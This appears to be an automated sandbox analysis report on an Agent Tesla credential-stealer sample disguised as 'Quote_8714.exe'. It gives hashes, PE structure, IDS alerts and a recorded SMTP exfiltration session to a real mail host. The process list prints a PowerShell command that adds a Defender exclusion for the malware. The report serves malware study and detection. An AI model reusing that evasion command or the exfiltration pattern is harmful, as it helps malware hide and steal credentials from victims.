                                                                                                    SSDEEP:48:lylWSU4xympjgs4RIoU99tK8NPZHUl7u1iMuge//Zf0Uyus:lGLHxvCsIfA2KRHmOugo1s
                                                                                                    MD5:5F0D346111304642BD6E3112D4031BA6
                                                                                                    SHA1:0141E3AAE28617B7F350C1FAA1DDA3F030724A95
                                                                                                    SHA-256:B8FC7BFEDD729A8BF385F9BF90A47B5F60C03CDA9FD02DE219362EB373292EBD
                                                                                                    SHA-512:8041A71256BCFA84E950D5E1C36419A75939AE350997712DB037F880411EB0763C49FD72A78A74759AFE4A310BB0F2B2E030D84391F3134C4029D435161A3E5F
                                                                                                    Malicious:false
                                                                                                    Reputation:low
                                                                                                    Preview:@...e.................................^..............@..........P................1]...E.....j.....(.Microsoft.PowerShell.Commands.ManagementH...............o..b~.D.poM......... .Microsoft.PowerShell.ConsoleHost0......................C.l]..7.s........System..4....................D...{..|f........System.Core.D...............4..7..D.#V.............System.Management.Automation<...............i..VdqF...|...........System.Configuration4.................%...K... ...........System.Xml..4.....................@.[8]'.\........System.Data.<................t.,.lG....M...........System.Management...@................z.U..G...5.f.1........System.DirectoryServicesH................WY..2.M.&..g*(g........Microsoft.PowerShell.Security...L.................*gQ?O.....x5.......#.Microsoft.Management.Infrastructure.8..................1...L..U;V.<}........System.Numerics.<...............V.}...@...i...........System.Transactions.P...............8..{...@.e..."4.......%.Microsoft.PowerShell.Com
                                                                                                    Process:C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
                                                                                                    File Type:ASCII text, with no line terminators
                                                                                                    Category:dropped
                                                                                                    Size (bytes):60
                                                                                                    Entropy (8bit):4.038920595031593
                                                                                                    Encrypted:false
                                                                                                    SSDEEP:3:Si2NPqzAYMLAKVpKGOyzKtFS:SnqbKAKWGX
                                                                                                    MD5:D17FE0A3F47BE24A6453E9EF58C94641
                                                                                                    SHA1:6AB83620379FC69F80C0242105DDFFD7D98D5D9D
                                                                                                    SHA-256:96AD1146EB96877EAB5942AE0736B82D8B5E2039A80D3D6932665C1A4C87DCF7
                                                                                                    SHA-512:5B592E58F26C264604F98F6AA12860758CE606D1C63220736CF0C779E4E18E3CEC8706930A16C38B20161754D1017D1657D35258E58CA22B18F5B232880DEC82
                                                                                                    Malicious:false
                                                                                                    Reputation:high, very likely benign file
                                                                                                    Preview:# PowerShell test file to determine AppLocker lockdown mode
                                                                                                    Process:C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
                                                                                                    File Type:ASCII text, with no line terminators
                                                                                                    Category:dropped
                                                                                                    Size (bytes):60
                                                                                                    Entropy (8bit):4.038920595031593
                                                                                                    Encrypted:false
                                                                                                    SSDEEP:3:Si2NPqzAYMLAKVpKGOyzKtFS:SnqbKAKWGX
                                                                                                    MD5:D17FE0A3F47BE24A6453E9EF58C94641
                                                                                                    SHA1:6AB83620379FC69F80C0242105DDFFD7D98D5D9D
                                                                                                    SHA-256:96AD1146EB96877EAB5942AE0736B82D8B5E2039A80D3D6932665C1A4C87DCF7
                                                                                                    SHA-512:5B592E58F26C264604F98F6AA12860758CE606D1C63220736CF0C779E4E18E3CEC8706930A16C38B20161754D1017D1657D35258E58CA22B18F5B232880DEC82
                                                                                                    Malicious:false
                                                                                                    Preview:# PowerShell test file to determine AppLocker lockdown mode
                                                                                                    Process:C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
                                                                                                    File Type:ASCII text, with no line terminators
                                                                                                    Category:dropped
                                                                                                    Size (bytes):60
                                                                                                    Entropy (8bit):4.038920595031593
                                                                                                    Encrypted:false
                                                                                                    SSDEEP:3:Si2NPqzAYMLAKVpKGOyzKtFS:SnqbKAKWGX
                                                                                                    MD5:D17FE0A3F47BE24A6453E9EF58C94641
                                                                                                    SHA1:6AB83620379FC69F80C0242105DDFFD7D98D5D9D
                                                                                                    SHA-256:96AD1146EB96877EAB5942AE0736B82D8B5E2039A80D3D6932665C1A4C87DCF7
                                                                                                    SHA-512:5B592E58F26C264604F98F6AA12860758CE606D1C63220736CF0C779E4E18E3CEC8706930A16C38B20161754D1017D1657D35258E58CA22B18F5B232880DEC82
                                                                                                    Malicious:false
                                                                                                    Preview:# PowerShell test file to determine AppLocker lockdown mode
                                                                                                    Process:C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
                                                                                                    File Type:ASCII text, with no line terminators
                                                                                                    Category:dropped
                                                                                                    Size (bytes):60
                                                                                                    Entropy (8bit):4.038920595031593
                                                                                                    Encrypted:false
                                                                                                    SSDEEP:3:Si2NPqzAYMLAKVpKGOyzKtFS:SnqbKAKWGX
                                                                                                    MD5:D17FE0A3F47BE24A6453E9EF58C94641
                                                                                                    SHA1:6AB83620379FC69F80C0242105DDFFD7D98D5D9D
                                                                                                    SHA-256:96AD1146EB96877EAB5942AE0736B82D8B5E2039A80D3D6932665C1A4C87DCF7
                                                                                                    SHA-512:5B592E58F26C264604F98F6AA12860758CE606D1C63220736CF0C779E4E18E3CEC8706930A16C38B20161754D1017D1657D35258E58CA22B18F5B232880DEC82
                                                                                                    Malicious:false
                                                                                                    Preview:# PowerShell test file to determine AppLocker lockdown mode
                                                                                                    File type:PE32 executable (GUI) Intel 80386 Mono/.Net assembly, for MS Windows
                                                                                                    Entropy (8bit):7.626282386889262
                                                                                                    TrID:
                                                                                                    • Win32 Executable (generic) Net Framework (10011505/4) 49.83%
                                                                                                    • Win32 Executable (generic) a (10002005/4) 49.78%
                                                                                                    • Generic CIL Executable (.NET, Mono, etc.) (73296/58) 0.36%
                                                                                                    • Generic Win/DOS Executable (2004/3) 0.01%
                                                                                                    • DOS Executable Generic (2002/1) 0.01%
                                                                                                    File name:Quote_8714.exe
                                                                                                    File size:679'936 bytes
                                                                                                    MD5:aab6786b56cd4bebf107aa1f00d680c4
                                                                                                    SHA1:785459ff067ac23f52789e7d0b36084186864dcb
                                                                                                    SHA256:e834cc0db159080a88d07c5e1c843905f7eb1f3b0b48ad1c5377f159fcb5e5f0
                                                                                                    SHA512:dba476bfb622f69b3cbd56e4b0d063f147de1291d2f8033ec0bdcfeb8ee8146b97e57331623c70a4f54423ce06b2c554be25d94cda841c948fc9fa8a25b2313f
                                                                                                    SSDEEP:12288:OgdY9shQgMYtaeuO+WEHCdQ+ULZuv73Dmswejx5wDYnD0Lb8hKwskGJ:bdhlvtl+WEvFZuv73R9jx5mYD0ccwsk
                                                                                                    TLSH:22E4F164BB5EC517C98517354E62E6B8216C9E9DF813D2039EECBFBF7D72A141C08282
                                                                                                    File Content Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......PE..L...,UVg..............0..6...(......"U... ...`....@.. ....................................@................................
                                                                                                    Icon Hash:17692632b3936907
                                                                                                    Entrypoint:0x4a5522
                                                                                                    Entrypoint Section:.text
                                                                                                    Digitally signed:false
                                                                                                    Imagebase:0x400000
                                                                                                    Subsystem:windows gui
                                                                                                    Image File Characteristics:EXECUTABLE_IMAGE, 32BIT_MACHINE
                                                                                                    DLL Characteristics:DYNAMIC_BASE, NX_COMPAT, NO_SEH, TERMINAL_SERVER_AWARE
                                                                                                    Time Stamp:0x6756552C [Mon Dec 9 02:25:48 2024 UTC]
                                                                                                    TLS Callbacks:
                                                                                                    CLR (.Net) Version:
                                                                                                    OS Version Major:4
                                                                                                    OS Version Minor:0
                                                                                                    File Version Major:4
                                                                                                    File Version Minor:0
                                                                                                    Subsystem Version Major:4
                                                                                                    Subsystem Version Minor:0
                                                                                                    Import Hash:f34d5f2d4577ed6d9ceec516c1f5a744
                                                                                                    Instruction
                                                                                                    jmp dword ptr [00402000h]
                                                                                                    push ebx
                                                                                                    add byte ptr [ecx+00h], bh
                                                                                                    jnc 00007FE5350EAA12h
                                                                                                    je 00007FE5350EAA12h
                                                                                                    add byte ptr [ebp+00h], ch
                                                                                                    add byte ptr [ecx+00h], al
                                                                                                    arpl word ptr [eax], ax
                                                                                                    je 00007FE5350EAA12h
                                                                                                    imul eax, dword ptr [eax], 00610076h
                                                                                                    je 00007FE5350EAA12h
                                                                                                    outsd
                                                                                                    add byte ptr [edx+00h], dh
                                                                                                    push ebx
                                                                                                    add byte ptr [ecx+00h], bh
                                                                                                    jnc 00007FE5350EAA12h
                                                                                                    je 00007FE5350EAA12h
                                                                                                    add byte ptr [ebp+00h], ch
                                                                                                    add byte ptr [edx+00h], dl
                                                                                                    add byte ptr [esi+00h], ah
                                                                                                    insb
                                                                                                    add byte ptr [ebp+00h], ah
                                                                                                    arpl word ptr [eax], ax
                                                                                                    je 00007FE5350EAA12h
                                                                                                    imul eax, dword ptr [eax], 006E006Fh
                                                                                                    add byte ptr [ecx+00h], al
                                                                                                    jnc 00007FE5350EAA12h
                                                                                                    jnc 00007FE5350EAA12h
                                                                                                    add byte ptr [ebp+00h], ch
                                                                                                    bound eax, dword ptr [eax]
                                                                                                    insb
                                                                                                    add byte ptr [ecx+00h], bh
                                                                                                    add byte ptr [eax], al
                                                                                                    add byte ptr [eax], al
                                                                                                    dec esp
                                                                                                    add byte ptr [edi+00h], ch
                                                                                                    popad
                                                                                                    add byte ptr [eax+eax+00h], ah
                                                                                                    add byte ptr [eax], al
                                                                                                    add byte ptr [eax], al
                                                                                                    add byte ptr [eax], al
                                                                                                    add byte ptr [eax], al
                                                                                                    add byte ptr [eax], al
                                                                                                    add byte ptr [eax], al
                                                                                                    add byte ptr [eax], al
                                                                                                    add byte ptr [eax], al
                                                                                                    add byte ptr [eax], al
                                                                                                    add byte ptr [eax], al
                                                                                                    add byte ptr [eax], al
                                                                                                    add byte ptr [eax], al
                                                                                                    add byte ptr [eax], al
                                                                                                    add byte ptr [eax], al
                                                                                                    add byte ptr [eax], al
                                                                                                    add byte ptr [eax], al
                                                                                                    add byte ptr [eax], al
                                                                                                    add byte ptr [eax], al
                                                                                                    add byte ptr [eax], al
                                                                                                    add byte ptr [eax], al
                                                                                                    add byte ptr [eax], al
                                                                                                    add byte ptr [eax], al
                                                                                                    add byte ptr [eax], al
                                                                                                    add byte ptr [eax], al
                                                                                                    add byte ptr [eax], al
                                                                                                    add byte ptr [eax], al
                                                                                                    add byte ptr [eax], al
                                                                                                    add byte ptr [eax], al
                                                                                                    add byte ptr [eax], al
                                                                                                    add byte ptr [eax], al
                                                                                                    add byte ptr [eax], al
                                                                                                    add byte ptr [eax], al
                                                                                                    add byte ptr [eax], al
                                                                                                    add byte ptr [eax], al
                                                                                                    add byte ptr [eax], al
                                                                                                    add byte ptr [eax], al
                                                                                                    add byte ptr [eax], al
                                                                                                    add byte ptr [eax], al
                                                                                                    add byte ptr [eax], al
                                                                                                    add byte ptr [eax], al
                                                                                                    add byte ptr [eax], al
                                                                                                    add byte ptr [eax], al
                                                                                                    add byte ptr [eax], al
                                                                                                    add byte ptr [eax], al
                                                                                                    add byte ptr [eax], al
                                                                                                    add byte ptr [eax], al
                                                                                                    add byte ptr [eax], al
                                                                                                    add byte ptr [eax], al
                                                                                                    NameVirtual AddressVirtual Size Is in Section
                                                                                                    IMAGE_DIRECTORY_ENTRY_EXPORT0x00x0
                                                                                                    IMAGE_DIRECTORY_ENTRY_IMPORT0xa54d00x4f.text
                                                                                                    IMAGE_DIRECTORY_ENTRY_RESOURCE0xa60000x2494.rsrc
                                                                                                    IMAGE_DIRECTORY_ENTRY_EXCEPTION0x00x0
                                                                                                    IMAGE_DIRECTORY_ENTRY_SECURITY0x00x0
                                                                                                    IMAGE_DIRECTORY_ENTRY_BASERELOC0xaa0000xc.reloc
                                                                                                    IMAGE_DIRECTORY_ENTRY_DEBUG0x00x0
                                                                                                    IMAGE_DIRECTORY_ENTRY_COPYRIGHT0x00x0
                                                                                                    IMAGE_DIRECTORY_ENTRY_GLOBALPTR0x00x0
                                                                                                    IMAGE_DIRECTORY_ENTRY_TLS0x00x0
                                                                                                    IMAGE_DIRECTORY_ENTRY_LOAD_CONFIG0x00x0
                                                                                                    IMAGE_DIRECTORY_ENTRY_BOUND_IMPORT0x00x0
                                                                                                    IMAGE_DIRECTORY_ENTRY_IAT0x20000x8.text
                                                                                                    IMAGE_DIRECTORY_ENTRY_DELAY_IMPORT0x00x0
                                                                                                    IMAGE_DIRECTORY_ENTRY_COM_DESCRIPTOR0x20080x48.text
                                                                                                    IMAGE_DIRECTORY_ENTRY_RESERVED0x00x0
                                                                                                    NameVirtual AddressVirtual SizeRaw SizeMD5Xored PEZLIB ComplexityFile TypeEntropyCharacteristics
                                                                                                    .text0x20000xa35880xa3600e73928ff3dddec3439188765110dd85cFalse0.888609111993114data7.6318451005062595IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ
                                                                                                    .rsrc0xa60000x24940x26003b1ffc4f53c1dd36a50c56a85ffa623bFalse0.8694490131578947data7.40351933902684IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_READ
                                                                                                    .reloc0xaa0000xc0x200e844be7c5ea9163b4a5b9a3498f3f0d7False0.044921875data0.10191042566270775IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_DISCARDABLE, IMAGE_SCN_MEM_READ
                                                                                                    NameRVASizeTypeLanguageCountryZLIB Complexity
                                                                                                    RT_ICON0xa61000x1e7ePNG image data, 256 x 256, 8-bit/color RGBA, non-interlaced0.9827056110684089
                                                                                                    RT_GROUP_ICON0xa7f900x14data1.05
                                                                                                    RT_VERSION0xa7fb40x2e0data0.452445652173913
                                                                                                    RT_MANIFEST0xa82a40x1eaXML 1.0 document, Unicode text, UTF-8 (with BOM) text, with CRLF line terminators0.5489795918367347
                                                                                                    DLLImport
                                                                                                    mscoree.dll_CorExeMain
                                                                                                    TimestampSIDSignatureSeveritySource IPSource PortDest IPDest PortProtocol
                                                                                                    2024-12-09T06:52:18.315528+01002855245ETPRO MALWARE Agent Tesla Exfil via SMTP1192.168.2.449735199.79.62.115587TCP
                                                                                                    2024-12-09T06:52:18.315528+01002855542ETPRO MALWARE Agent Tesla CnC Exfil Activity1192.168.2.449735199.79.62.115587TCP
                                                                                                    2024-12-09T06:53:52.010600+01002030171ET MALWARE AgentTesla Exfil Via SMTP1192.168.2.449735199.79.62.115587TCP
                                                                                                    2024-12-09T06:53:52.010600+01002839723ETPRO MALWARE Win32/Agent Tesla SMTP Activity1192.168.2.449735199.79.62.115587TCP
                                                                                                    2024-12-09T06:53:52.010600+01002840032ETPRO MALWARE Win32/AgentTesla/OriginLogger Data Exfil via SMTP M21192.168.2.449735199.79.62.115587TCP
                                                                                                    TimestampSource PortDest PortSource IPDest IP
                                                                                                    Dec 9, 2024 06:52:14.683379889 CET49735587192.168.2.4199.79.62.115
                                                                                                    Dec 9, 2024 06:52:14.802700996 CET58749735199.79.62.115192.168.2.4
                                                                                                    Dec 9, 2024 06:52:14.803548098 CET49735587192.168.2.4199.79.62.115
                                                                                                    Dec 9, 2024 06:52:16.031785965 CET58749735199.79.62.115192.168.2.4
                                                                                                    Dec 9, 2024 06:52:16.032668114 CET49735587192.168.2.4199.79.62.115
                                                                                                    Dec 9, 2024 06:52:16.152095079 CET58749735199.79.62.115192.168.2.4
                                                                                                    Dec 9, 2024 06:52:16.398808002 CET58749735199.79.62.115192.168.2.4
                                                                                                    Dec 9, 2024 06:52:16.399776936 CET49735587192.168.2.4199.79.62.115
                                                                                                    Dec 9, 2024 06:52:16.519192934 CET58749735199.79.62.115192.168.2.4
                                                                                                    Dec 9, 2024 06:52:16.765840054 CET58749735199.79.62.115192.168.2.4
                                                                                                    Dec 9, 2024 06:52:16.766165972 CET49735587192.168.2.4199.79.62.115
                                                                                                    Dec 9, 2024 06:52:16.885551929 CET58749735199.79.62.115192.168.2.4
                                                                                                    Dec 9, 2024 06:52:17.199697971 CET58749735199.79.62.115192.168.2.4
                                                                                                    Dec 9, 2024 06:52:17.203876972 CET49735587192.168.2.4199.79.62.115
                                                                                                    Dec 9, 2024 06:52:17.323374987 CET58749735199.79.62.115192.168.2.4
                                                                                                    Dec 9, 2024 06:52:17.569897890 CET58749735199.79.62.115192.168.2.4
                                                                                                    Dec 9, 2024 06:52:17.570204973 CET49735587192.168.2.4199.79.62.115
                                                                                                    Dec 9, 2024 06:52:17.689640045 CET58749735199.79.62.115192.168.2.4
                                                                                                    Dec 9, 2024 06:52:17.943624020 CET58749735199.79.62.115192.168.2.4
                                                                                                    Dec 9, 2024 06:52:17.948589087 CET49735587192.168.2.4199.79.62.115
                                                                                                    Dec 9, 2024 06:52:18.068145990 CET58749735199.79.62.115192.168.2.4
                                                                                                    Dec 9, 2024 06:52:18.314745903 CET58749735199.79.62.115192.168.2.4
                                                                                                    Dec 9, 2024 06:52:18.315293074 CET49735587192.168.2.4199.79.62.115
                                                                                                    Dec 9, 2024 06:52:18.315527916 CET49735587192.168.2.4199.79.62.115
                                                                                                    Dec 9, 2024 06:52:18.315527916 CET49735587192.168.2.4199.79.62.115
                                                                                                    Dec 9, 2024 06:52:18.315527916 CET49735587192.168.2.4199.79.62.115
                                                                                                    Dec 9, 2024 06:52:18.434612989 CET58749735199.79.62.115192.168.2.4
                                                                                                    Dec 9, 2024 06:52:18.434791088 CET58749735199.79.62.115192.168.2.4
                                                                                                    Dec 9, 2024 06:52:18.434909105 CET58749735199.79.62.115192.168.2.4
                                                                                                    Dec 9, 2024 06:52:18.434947014 CET58749735199.79.62.115192.168.2.4
                                                                                                    Dec 9, 2024 06:52:18.776746988 CET58749735199.79.62.115192.168.2.4
                                                                                                    Dec 9, 2024 06:52:18.817523003 CET49735587192.168.2.4199.79.62.115
                                                                                                    Dec 9, 2024 06:53:51.443681955 CET49735587192.168.2.4199.79.62.115
                                                                                                    Dec 9, 2024 06:53:51.563122034 CET58749735199.79.62.115192.168.2.4
                                                                                                    Dec 9, 2024 06:53:52.010400057 CET58749735199.79.62.115192.168.2.4
                                                                                                    Dec 9, 2024 06:53:52.010550976 CET58749735199.79.62.115192.168.2.4
                                                                                                    Dec 9, 2024 06:53:52.010557890 CET49735587192.168.2.4199.79.62.115
                                                                                                    Dec 9, 2024 06:53:52.010600090 CET49735587192.168.2.4199.79.62.115
                                                                                                    Dec 9, 2024 06:53:52.129771948 CET58749735199.79.62.115192.168.2.4
                                                                                                    TimestampSource PortDest PortSource IPDest IP
                                                                                                    Dec 9, 2024 06:52:11.430202007 CET5863153192.168.2.41.1.1.1
                                                                                                    Dec 9, 2024 06:52:12.427118063 CET5863153192.168.2.41.1.1.1
                                                                                                    Dec 9, 2024 06:52:13.442869902 CET5863153192.168.2.41.1.1.1
                                                                                                    Dec 9, 2024 06:52:14.675540924 CET53586311.1.1.1192.168.2.4
                                                                                                    Dec 9, 2024 06:52:14.675556898 CET53586311.1.1.1192.168.2.4
                                                                                                    Dec 9, 2024 06:52:14.675566912 CET53586311.1.1.1192.168.2.4
                                                                                                    TimestampSource IPDest IPTrans IDOP CodeNameTypeClassDNS over HTTPS
                                                                                                    Dec 9, 2024 06:52:11.430202007 CET192.168.2.41.1.1.10x362eStandard query (0)mail.mbarieservicesltd.comA (IP address)IN (0x0001)false
                                                                                                    Dec 9, 2024 06:52:12.427118063 CET192.168.2.41.1.1.10x362eStandard query (0)mail.mbarieservicesltd.comA (IP address)IN (0x0001)false
                                                                                                    Dec 9, 2024 06:52:13.442869902 CET192.168.2.41.1.1.10x362eStandard query (0)mail.mbarieservicesltd.comA (IP address)IN (0x0001)false
                                                                                                    TimestampSource IPDest IPTrans IDReply CodeNameCNameAddressTypeClassDNS over HTTPS
                                                                                                    Dec 9, 2024 06:52:14.675540924 CET1.1.1.1192.168.2.40x362eNo error (0)mail.mbarieservicesltd.com199.79.62.115A (IP address)IN (0x0001)false
                                                                                                    Dec 9, 2024 06:52:14.675556898 CET1.1.1.1192.168.2.40x362eNo error (0)mail.mbarieservicesltd.com199.79.62.115A (IP address)IN (0x0001)false
                                                                                                    Dec 9, 2024 06:52:14.675566912 CET1.1.1.1192.168.2.40x362eNo error (0)mail.mbarieservicesltd.com199.79.62.115A (IP address)IN (0x0001)false
                                                                                                    TimestampSource PortDest PortSource IPDest IPCommands
                                                                                                    Dec 9, 2024 06:52:16.031785965 CET58749735199.79.62.115192.168.2.4220-md-54.webhostbox.net ESMTP Exim 4.96.2 #2 Mon, 09 Dec 2024 11:22:15 +0530
                                                                                                    220-We do not authorize the use of this system to transport unsolicited,
                                                                                                    220 and/or bulk e-mail.
                                                                                                    Dec 9, 2024 06:52:16.032668114 CET49735587192.168.2.4199.79.62.115EHLO 767668
                                                                                                    Dec 9, 2024 06:52:16.398808002 CET58749735199.79.62.115192.168.2.4250-md-54.webhostbox.net Hello 767668 [8.46.123.228]
                                                                                                    250-SIZE 52428800
                                                                                                    250-8BITMIME
                                                                                                    250-PIPELINING
                                                                                                    250-PIPECONNECT
                                                                                                    250-AUTH PLAIN LOGIN
                                                                                                    250-STARTTLS
                                                                                                    250 HELP
                                                                                                    Dec 9, 2024 06:52:16.399776936 CET49735587192.168.2.4199.79.62.115AUTH login c2FsZXNzQG1iYXJpZXNlcnZpY2VzbHRkLmNvbQ==
                                                                                                    Dec 9, 2024 06:52:16.765840054 CET58749735199.79.62.115192.168.2.4334 UGFzc3dvcmQ6
                                                                                                    Dec 9, 2024 06:52:17.199697971 CET58749735199.79.62.115192.168.2.4235 Authentication succeeded
                                                                                                    Dec 9, 2024 06:52:17.203876972 CET49735587192.168.2.4199.79.62.115MAIL FROM:<saless@mbarieservicesltd.com>
                                                                                                    Dec 9, 2024 06:52:17.569897890 CET58749735199.79.62.115192.168.2.4250 OK
                                                                                                    Dec 9, 2024 06:52:17.570204973 CET49735587192.168.2.4199.79.62.115RCPT TO:<iinfo@mbarieservicesltd.com>
                                                                                                    Dec 9, 2024 06:52:17.943624020 CET58749735199.79.62.115192.168.2.4250 Accepted
                                                                                                    Dec 9, 2024 06:52:17.948589087 CET49735587192.168.2.4199.79.62.115DATA
                                                                                                    Dec 9, 2024 06:52:18.314745903 CET58749735199.79.62.115192.168.2.4354 Enter message, ending with "." on a line by itself
                                                                                                    Dec 9, 2024 06:52:18.315527916 CET49735587192.168.2.4199.79.62.115.
                                                                                                    Dec 9, 2024 06:52:18.776746988 CET58749735199.79.62.115192.168.2.4250 OK id=1tKWgs-002mj2-0P
                                                                                                    Dec 9, 2024 06:53:51.443681955 CET49735587192.168.2.4199.79.62.115QUIT
                                                                                                    Dec 9, 2024 06:53:52.010400057 CET58749735199.79.62.115192.168.2.4221 md-54.webhostbox.net closing connection

                                                                                                    Click to jump to process

                                                                                                    Click to jump to process

                                                                                                    Click to dive into process behavior distribution

                                                                                                    Click to jump to process

                                                                                                    Target ID:0
                                                                                                    Start time:00:52:03
                                                                                                    Start date:09/12/2024
                                                                                                    Path:C:\Users\user\Desktop\Quote_8714.exe
                                                                                                    Wow64 process (32bit):true
                                                                                                    Commandline:"C:\Users\user\Desktop\Quote_8714.exe"
                                                                                                    Imagebase:0x5f0000
                                                                                                    File size:679'936 bytes
                                                                                                    MD5 hash:AAB6786B56CD4BEBF107AA1F00D680C4
                                                                                                    Has elevated privileges:true
                                                                                                    Has administrator privileges:true
                                                                                                    Programmed in:C, C++ or other language
                                                                                                    Yara matches:
                                                                                                    • Rule: JoeSecurity_AgentTesla_2, Description: Yara detected AgentTesla, Source: 00000000.00000002.1749716667.0000000003A59000.00000004.00000800.00020000.00000000.sdmp, Author: Joe Security
                                                                                                    Reputation:low
                                                                                                    Has exited:true

                                                                                                    Target ID:2
                                                                                                    Start time:00:52:06
                                                                                                    Start date:09/12/2024
                                                                                                    Path:C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
                                                                                                    Wow64 process (32bit):true
                                                                                                    Commandline:"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Add-MpPreference -ExclusionPath "C:\Users\user\Desktop\Quote_8714.exe"
                                                                                                    Imagebase:0x3c0000
                                                                                                    File size:433'152 bytes
                                                                                                    MD5 hash:C32CA4ACFCC635EC1EA6ED8A34DF5FAC
                                                                                                    Has elevated privileges:true
                                                                                                    Has administrator privileges:true
                                                                                                    Programmed in:C, C++ or other language
                                                                                                    Reputation:high
                                                                                                    Has exited:true

                                                                                                    Target ID:3
                                                                                                    Start time:00:52:06
                                                                                                    Start date:09/12/2024
                                                                                                    Path:C:\Windows\System32\conhost.exe
                                                                                                    Wow64 process (32bit):false
                                                                                                    Commandline:C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                                                                                                    Imagebase:0x7ff7699e0000
                                                                                                    File size:862'208 bytes
                                                                                                    MD5 hash:0D698AF330FD17BEE3BF90011D49251D
                                                                                                    Has elevated privileges:true
                                                                                                    Has administrator privileges:true
                                                                                                    Programmed in:C, C++ or other language
                                                                                                    Reputation:high
                                                                                                    Has exited:true

                                                                                                    Target ID:4
                                                                                                    Start time:00:52:08
                                                                                                    Start date:09/12/2024
                                                                                                    Path:C:\Windows\System32\wbem\WmiPrvSE.exe
                                                                                                    Wow64 process (32bit):false
                                                                                                    Commandline:C:\Windows\system32\wbem\wmiprvse.exe -secured -Embedding
                                                                                                    Imagebase:0x7ff693ab0000
                                                                                                    File size:496'640 bytes
                                                                                                    MD5 hash:60FF40CFD7FB8FE41EE4FE9AE5FE1C51
                                                                                                    Has elevated privileges:true
                                                                                                    Has administrator privileges:false
                                                                                                    Programmed in:C, C++ or other language
                                                                                                    Reputation:high
                                                                                                    Has exited:true

                                                                                                    Target ID:5
                                                                                                    Start time:00:52:08
                                                                                                    Start date:09/12/2024
                                                                                                    Path:C:\Users\user\Desktop\Quote_8714.exe
                                                                                                    Wow64 process (32bit):true
                                                                                                    Commandline:"C:\Users\user\Desktop\Quote_8714.exe"
                                                                                                    Imagebase:0x5c0000
                                                                                                    File size:679'936 bytes
                                                                                                    MD5 hash:AAB6786B56CD4BEBF107AA1F00D680C4
                                                                                                    Has elevated privileges:true
                                                                                                    Has administrator privileges:true
                                                                                                    Programmed in:C, C++ or other language
                                                                                                    Yara matches:
                                                                                                    • Rule: JoeSecurity_AgentTesla_1, Description: Yara detected AgentTesla, Source: 00000005.00000002.2942693861.0000000002ADA000.00000004.00000800.00020000.00000000.sdmp, Author: Joe Security
                                                                                                    • Rule: JoeSecurity_AgentTesla_2, Description: Yara detected AgentTesla, Source: 00000005.00000002.2940203488.0000000000402000.00000040.00000400.00020000.00000000.sdmp, Author: Joe Security
                                                                                                    • Rule: JoeSecurity_CredentialStealer, Description: Yara detected Credential Stealer, Source: 00000005.00000002.2942693861.0000000002A81000.00000004.00000800.00020000.00000000.sdmp, Author: Joe Security
                                                                                                    • Rule: JoeSecurity_AgentTesla_1, Description: Yara detected AgentTesla, Source: 00000005.00000002.2942693861.0000000002A81000.00000004.00000800.00020000.00000000.sdmp, Author: Joe Security
                                                                                                    Reputation:low
                                                                                                    Has exited:false

                                                                                                    Reset < >

                                                                                                      Execution Graph

                                                                                                      Execution Coverage:11.5%
                                                                                                      Dynamic/Decrypted Code Coverage:100%
                                                                                                      Signature Coverage:1.7%
                                                                                                      Total number of Nodes:405
                                                                                                      Total number of Limit Nodes:24
                                                                                                      execution_graph 63788 bca5e08 PeekMessageW 63789 bca5e7f 63788->63789 63861 bca61a8 KiUserCallbackDispatcher 63862 bca621c 63861->63862 63792 723ef70 63794 723ef96 63792->63794 63793 723efaa 63794->63793 63795 1069d3f 3 API calls 63794->63795 63796 106de88 3 API calls 63794->63796 63795->63793 63796->63793 63863 f9d01c 63864 f9d034 63863->63864 63865 f9d08e 63864->63865 63868 4f22c17 63864->63868 63877 4f20ad4 63864->63877 63871 4f22c45 63868->63871 63869 4f22c79 63902 4f20bfc 63869->63902 63871->63869 63872 4f22c69 63871->63872 63886 4f22da0 63872->63886 63891 4f22d91 63872->63891 63896 4f22e6c 63872->63896 63873 4f22c77 63878 4f20adf 63877->63878 63879 4f22c79 63878->63879 63881 4f22c69 63878->63881 63880 4f20bfc CallWindowProcW 63879->63880 63882 4f22c77 63880->63882 63883 4f22da0 CallWindowProcW 63881->63883 63884 4f22d91 CallWindowProcW 63881->63884 63885 4f22e6c CallWindowProcW 63881->63885 63883->63882 63884->63882 63885->63882 63887 4f22db4 63886->63887 63906 4f22e58 63887->63906 63910 4f22e48 63887->63910 63888 4f22e40 63888->63873 63893 4f22d9b 63891->63893 63892 4f22e40 63892->63873 63894 4f22e58 CallWindowProcW 63893->63894 63895 4f22e48 CallWindowProcW 63893->63895 63894->63892 63895->63892 63897 4f22e2a 63896->63897 63898 4f22e7a 63896->63898 63900 4f22e58 CallWindowProcW 63897->63900 63901 4f22e48 CallWindowProcW 63897->63901 63899 4f22e40 63899->63873 63900->63899 63901->63899 63903 4f20c07 63902->63903 63904 4f24309 63903->63904 63905 4f2435a CallWindowProcW 63903->63905 63904->63873 63905->63904 63907 4f22e69 63906->63907 63915 723f960 63906->63915 63920 4f2429e 63906->63920 63907->63888 63911 4f22e53 63910->63911 63912 4f22e69 63911->63912 63913 723f960 CallWindowProcW 63911->63913 63914 4f2429e CallWindowProcW 63911->63914 63912->63888 63913->63912 63914->63912 63916 723f9a0 63915->63916 63917 723f96e 63915->63917 63916->63907 63918 723f975 63917->63918 63923 723f9c8 63917->63923 63918->63907 63921 4f20bfc CallWindowProcW 63920->63921 63922 4f242aa 63921->63922 63922->63907 63924 723fa23 63923->63924 63925 723f9ee 63923->63925 63924->63925 63926 4f2429e CallWindowProcW 63924->63926 63925->63918 63926->63925 63574 106eb10 63575 106eb2d 63574->63575 63577 106eb71 63575->63577 63578 106cac4 63575->63578 63579 106cacf 63578->63579 63582 106dde8 63579->63582 63581 106f5af 63581->63577 63585 106ddf3 63582->63585 63583 106f758 63583->63581 63584 106f721 63588 723fe08 63584->63588 63585->63583 63585->63584 63586 106dde8 2 API calls 63585->63586 63586->63585 63590 723fe1a 